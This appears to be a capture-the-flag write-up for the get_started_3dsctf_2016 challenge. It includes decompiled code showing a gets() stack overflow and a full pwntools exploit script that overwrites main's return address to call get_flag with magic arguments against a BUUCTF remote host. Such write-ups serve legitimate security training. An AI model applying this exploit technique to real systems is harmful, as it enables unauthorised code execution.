ctf【get_started_3dsctf_2016】

Reverse

// Decompiled (IDA) main() of the get_started_3dsctf_2016 binary.
//
// Vulnerability: gets() has no length bound, so a line longer than the
// 56-byte stack buffer v4 overwrites whatever lies above it on the stack --
// including the saved return address main returns through. That is the
// write primitive the exploit script below relies on (0x38 bytes of padding,
// then the address it wants main to "return" to).
int __cdecl main(int argc, const char **argv, const char **envp)
{
    
    
  char v4[56]; // [esp+4h] [ebp-38h] BYREF  -- 56 == 0x38 == the padding length used in the payload

  // Decompiler artifact: v4[0] is passed as a surplus printf argument while
  // still uninitialized; the format string contains no conversion, so the
  // value is never consumed. Note the prompt has no trailing '\n' -- when
  // stdout is not a terminal it may stay in the stdio buffer, so an exploit
  // should not block waiting to receive it.
  printf("Qual a palavrinha magica? ", v4[0]);
  gets(v4); // unbounded read: stops only at '\n' or EOF, never at 56 bytes -> stack buffer overflow
  return 0;
}

// Decompiled (IDA) get_flag(). It is never called from main(); it is only
// reachable by hijacking control flow. Prints flag.txt byte by byte when,
// and only when, both arguments equal the magic constants checked below.
//
// Calling convention: __cdecl, so at entry a1 is at [esp+4] and a2 at
// [esp+8]. When the function is entered through an overwritten return
// address (a RET, not a CALL), [esp] is the dword that follows get_flag's
// address in the payload -- that dword becomes get_flag's own return
// address, and the two dwords after it become a1 and a2.
void __cdecl get_flag(int a1, int a2)
{
    
    
  int v2; // esi  -- the FILE * from fopen(), typed as int by the decompiler
  unsigned __int8 v3; // al
  int v4; // ecx
  unsigned __int8 v5; // al

  // Both 32-bit constants must match exactly; they are passed as the two
  // dwords after the fake return address in the exploit payload.
  if ( a1 == 0x308CD64F && a2 == 0x195719D1 )
  {
    
    
    // No NULL check on the FILE *: if flag.txt is missing or unreadable,
    // getc(NULL) below dereferences a null pointer and the process crashes.
    v2 = fopen("flag.txt", "rt");
    v3 = getc(v2);
    // getc() returns int; EOF (-1) truncated to unsigned __int8 is 0xFF, so
    // this is effectively an EOF test. Side effect: a literal 0xFF byte in
    // the flag file would also terminate the loop early.
    if ( v3 != 0xFF )
    {
    
    
      v4 = (char)v3;
      do
      {
    
    
        // putchar() output is typically buffered when stdout is not a tty;
        // the bytes only reach the remote client when the buffer is
        // flushed, e.g. by a normal exit() after get_flag returns.
        putchar(v4);
        v5 = getc(v2);
        v4 = (char)v5;
      }
      while ( v5 != 0xFF );
    }
    fclose(v2);
  }
}

Attack plan: main()'s gets() overflow lets us overwrite main's return address. Point it at get_flag, and lay out the rest of the payload so that get_flag sees a sane return address followed by the two magic arguments it checks.

get_flag is __cdecl, so after we "return" into it the dword following its address is treated as get_flag's return address, and the next two dwords are a1 and a2. They must satisfy a1 == 0x308CD64F && a2 == 0x195719D1.

get_flag function address 0x80489A0

main function address 0x8048A20

Exploit script

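# -*- coding:utf-8 -*-
"""Exploit for get_started_3dsctf_2016 (BUUCTF remote instance).

main() reads the "magic word" with gets() into a 56-byte stack buffer, so an
over-long line overwrites main's return address. We return into get_flag()
with a fake return address (exit) followed by the two magic arguments it
checks; get_flag prints flag.txt and then returns into exit(), whose normal
shutdown flushes stdout so the flag actually reaches us.
"""
from pwn import *
from LibcSearcher import *  # not used by this exploit; kept from the original write-up

HOST, PORT = "node4.buuoj.cn", 25455

# Stack layout (see decompiled main): char v4[56] at ebp-0x38.
PADDING_LEN = 0x38          # fill the 56-byte buffer up to the saved return address

GET_FLAG = 0x080489A0       # get_flag(int a1, int a2)
EXIT_ADDR = 0x0804E6A0      # exit in the binary; get_flag returns here. A normal
                            # exit flushes the buffered flag output -- crashing on
                            # the return instead would likely lose it.
MAGIC_A1 = 0x308CD64F       # value get_flag requires for a1
MAGIC_A2 = 0x195719D1       # value get_flag requires for a2

# cdecl: entering get_flag via RET means the dword after its address is its
# return address, then a1, then a2.
payload = b"a" * PADDING_LEN
payload += p32(GET_FLAG)    # overwritten return address of main
payload += p32(EXIT_ADDR)   # get_flag's return address
payload += p32(MAGIC_A1)    # a1
payload += p32(MAGIC_A2)    # a2

# gets() stops at the first '\n', so a 0x0A byte anywhere in the payload
# would silently truncate it. Fail loudly instead of debugging a mystery.
assert b"\n" not in payload, "payload contains a newline byte; gets() would truncate it"

p = remote(HOST, PORT)
# Do not wait for the prompt: it is printed without a trailing newline and
# may still be sitting in the remote process's stdout buffer.
p.sendline(payload)
p.interactive()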

[Note] 0x0804e6a0 is the address of exit in the program, used as get_flag's return address. Only when the program exits normally does the flag reliably come back: get_flag writes it with putchar(), which is buffered when stdout is not a terminal, and a normal exit() flushes that buffer. If get_flag instead returned to garbage and crashed, the buffered output would most likely be lost.

(An alternative approach, not shown here, is to change memory page protections so that a writable region becomes executable and run injected code from it.)


Origin blog.csdn.net/HUANGliang_/article/details/127585435